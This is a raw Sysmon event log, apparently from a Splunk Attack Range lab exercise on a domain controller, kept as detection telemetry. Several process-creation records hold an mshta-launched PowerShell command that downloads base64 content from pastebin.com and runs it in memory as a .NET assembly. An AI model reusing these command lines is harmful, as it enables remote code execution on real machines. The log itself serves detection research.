10341000x8000000000000000108115Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.079{58E9C193-B541-615A-8002-00000000FC01}85888724C:\Windows\system32\mshta.exe{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108114Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.079{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8302-00000000FC01}8716C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108113Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.082{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000108112Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.079{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B542-615A-8302-00000000FC01}8716C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108111Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.063{58E9C193-B542-615A-8302-00000000FC01}87168752C:\Windows\system32\conhost.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108110Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.063{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8302-00000000FC01}8716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000108102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.047{58E9C193-B541-615A-7F02-00000000FC01}85688684C:\Windows\system32\mshta.exe{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\shell32.dll+3ccff|C:\Windows\System32\shell32.dll+3cb8c|C:\Windows\System32\shell32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000108100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.053{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B541-615A-7F02-00000000FC01}8568C:\Windows\System32\mshta.exemshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/rQL02r6C').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000108099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.010{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.010{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.010{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:14.010{58E9C193-ACA5-615A-0B00-00000000FC01}6282304C:\Windows\system32\lsass.exe{58E9C193-B541-615A-8102-00000000FC01}8608C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:13.996{58E9C193-AE66-615A-C000-00000000FC01}46564748C:\Windows\system32\taskhostw.exe{58E9C193-B541-615A-8002-00000000FC01}8588C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083675Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:15.514{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=120B5911BD5CD283D4FADA1794216C8B,SHA256=1B817FDB54CC15589F885B8B1104A5A4DBC9BD1534AA1A8EA918C30BE84716E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.344{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DC224EC6562E9107FCFB947ED7B4856A,SHA256=DC04F3DD9ABCA7FE879A83E616C861F0F60DB83B83279943B28EE174368CBF76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.344{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BAF591B48149606DE4C8AA9D3FBBA29,SHA256=656EC7C9A428858F27ED95C1DD7CAF8B72F76DC3897044F092B1916AB5F68484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083674Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:15.016{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-035MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083677Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:16.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D942D9D62709887CDBECAC68A937FEF3,SHA256=87BC5310189C6FD01F88B95CC2A649EA0BE2C1694C35579B4768DA2008A706B2,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000108174Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.138{58E9C193-B542-615A-8602-00000000FC01}8800pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000108173Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.090{58E9C193-B542-615A-8402-00000000FC01}8764pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000108172Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.037{58E9C193-B542-615A-8202-00000000FC01}8704pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000108171Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:16.392{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69A1D6F784DBDAC376417B72CF2B5900,SHA256=1043910CD994590B0ADAAA639650D6F31B17424984468FE396D18577E3A2DDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083676Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:16.015{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-036MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.026{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64660- 23542300x800000000000000083678Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:17.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC9601B7212C3593B078ECC24ABE3442,SHA256=642C1F6AC15DDD01A7EEF0585D4D559F21E3416DB27649E708DFCB87C658524D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108178Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:17.441{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=804DF6C4B80C9829E364FC4490A6F00C,SHA256=4E0196B112C4F7FD3AB4BADDF6947E2212C53D0CB633486D96D0CBDAB35D917C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108177Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.138{58E9C193-B542-615A-8602-00000000FC01}8800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51942-false104.23.99.190-443https 354300x8000000000000000108176Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.090{58E9C193-B542-615A-8402-00000000FC01}8764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51941-false104.23.99.190-443https 354300x8000000000000000108175Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:15.039{58E9C193-B542-615A-8202-00000000FC01}8704C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51940-false104.23.99.190-443https 23542300x8000000000000000108179Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:18.456{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=121819767844068EFC9394E0596E9C97,SHA256=31B3825495E0F85B612AD7B8665B8E11DA77F22E33973A55D635747FC3AE66A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083680Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:18.525{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACFD120CD71A2026FED4B2A38115D38B,SHA256=493F3EDA23F513E0DA3F65BC2FC9C5EEA978E5E82F4FF10044E9E683AD1D32EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083679Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:15.710{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50186-false10.0.1.12-8000- 23542300x8000000000000000108182Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 